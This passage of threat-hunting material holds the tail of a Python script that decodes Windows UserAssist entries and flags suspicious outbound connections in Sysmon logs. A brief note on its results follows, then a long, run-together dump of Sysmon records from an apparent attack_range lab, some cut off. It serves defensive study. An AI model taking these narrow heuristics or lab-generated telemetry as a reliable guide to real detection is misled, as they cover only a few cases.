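     "User": "NT AUTHORITY\\SYSTEM", "Protocol": "tcp", "Initiated": "true",
     "DestinationIp": "10.0.1.12", "DestinationPort": "8000"},
]


def decode_userassist(target_object: str) -> str:
    """UserAssist value names are stored ROT13-encoded by Windows; return the clear name."""
    if USERASSIST_MARKER not in target_object:
        raise ValueError("not a UserAssist registry path")
    value_name = target_object.rsplit("\\", 1)[-1]
    return codecs.decode(value_name, "rot_13")


def _is_public(ip: str) -> bool:
    """True for globally routable addresses; malformed or private/loopback/link-local give False."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def network_findings(ev: Dict[str, str]) -> List[str]:
    """Hunting leads for one Event ID 3 record; an empty list means nothing notable."""
    findings: List[str] = []
    if ev.get("EventID") != "3" or ev.get("Initiated") != "true":
        return findings
    image = ev.get("Image", "")
    exe = image.rsplit("\\", 1)[-1].lower()
    if image == "<unknown process>":
        # Sysmon had no process record for the socket owner (process gone or started before Sysmon).
        findings.append("connection not attributed to a process (Sysmon had no process record)")
    if "\\syswow64\\" in image.lower() and exe in WOW64_HOSTS and _is_public(ev.get("DestinationIp", "")):
        findings.append(f"32-bit {exe} initiated {ev.get('Protocol', '?')} to public host "
                        f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')} as {ev.get('User', '?')}")
    return findings


def triage(events: List[Dict[str, str]]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Return (decoded UserAssist names, [(image, finding), ...]) over a list of records."""
    userassist = [decode_userassist(e["TargetObject"]) for e in events
                  if e.get("EventID") == "13" and USERASSIST_MARKER in e.get("TargetObject", "")]
    leads = [(e["Image"], f) for e in events for f in network_findings(e)]
    return userassist, leads


if __name__ == "__main__":
    names, leads = triage(SAMPLE_EVENTS)
    for n in names:
        print("UserAssist:", n)
    for image, finding in leads:
        print("LEAD:", image, "->", finding)
```

On the sample records the script decodes the two UserAssist names to Microsoft.Office.WINWORD.EXE.15 and UEME_CTLSESSION (the Explorer session counter), flags the rundll32.exe and dllhost.exe connections and the unattributed one, and leaves the Splunk streamfwd.exe connection to 10.0.1.12:8000 alone. Two caveats apply when reading the dump itself: attack_range is a lab, so the EC2 destination is as likely to be the range's own attack infrastructure as anything else, and the Event ID 23 records on this page show the deleted files were not archived ("insufficient disk space"), so their MD5/SHA256 values are the only artefact that survives for those files.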
10341000x80000000000000001061139Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.605{761B69BB-612D-6080-995C-00000000BA01}57848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061138Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.465{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-612D-6080-995C-00000000BA01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061137Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:21.463{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061136Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.463{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061135Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
734700x80000000000000001530966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001530965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001530964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001530963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001530962Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001530961Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001530960Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001530959Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001530958Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001530957Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001530956Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001530955Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001530954Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001530953Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001530952Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001530951Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001530950Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001530949Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001530948Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 
734700x80000000000000001530947Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001530946Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x80000000000000001530945Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001530944Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530943Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001530942Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001530941Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001530940Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:27.097{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x80000000000000001530939Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001530938Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.097{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001530937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:27.092{21761711-6133-6080-BF5D-00000000BB01}5264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001530936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001530934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 
17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001530932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001530931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:27.091{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x80000000000000001061171Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:27.056{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061170Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:27.056{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061175Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:28.165{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3637591B91CEAF5635A07D9B4A495D69,SHA256=379E49A1172A3D2530B4EC16C4F1343B8285B7D75AF0D70AF9533358B5B331A4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:28.096{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:28.096{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program 